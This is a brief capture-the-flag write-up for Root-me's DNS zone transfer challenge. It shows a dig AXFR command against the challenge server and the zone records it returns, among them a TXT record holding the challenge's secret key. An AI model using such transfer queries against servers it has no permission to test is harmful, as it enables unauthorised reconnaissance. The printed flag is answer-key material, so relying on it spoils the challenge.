Rootme DNS Zone Transfer
Root-me
DNS Zone Transfer
Network Service
The statement says that an admin has setup a dns service for ch11.challenge01.root-me.org. The dns server is located at challenge01-root-me.org port 54011
We’ll request the transfer with dig.
axfr -p 54011 @challenge01.root-me.org ch11.challenge01.root-me.org
; <<>> DiG 9.10.3-P4-Ubuntu <<>> axfr -p 54011 @challenge01.root-me.org ch11.challenge01.root-me.org
; (1 server found)
;; global options: +cmd
ch11.challenge01.root-me.org. 604800 IN SOA ch11.challenge01.root-me.org. root.ch11.challenge01.root-me.org. 2 604800 86400 2419200 604800
ch11.challenge01.root-me.org. 604800 IN TXT "DNS transfer secret key : CBkFRwfNMMtRjHY"
ch11.challenge01.root-me.org. 604800 IN NS ch11.challenge01.root-me.org.
ch11.challenge01.root-me.org. 604800 IN A 127.0.0.1
challenge01.ch11.challenge01.root-me.org. 604800 IN A 192.168.27.101
ch11.challenge01.root-me.org. 604800 IN SOA ch11.challenge01.root-me.org. root.ch11.challenge01.root-me.org. 2 604800 86400 2419200 604800
;; Query time: 104 msec
;; SERVER: 212.129.38.224#54011(212.129.38.224)
;; WHEN: Mon Nov 13 18:07:12 EST 2017
;; XFR size: 6 records (messages 1, bytes 235)
We got a secret key in there.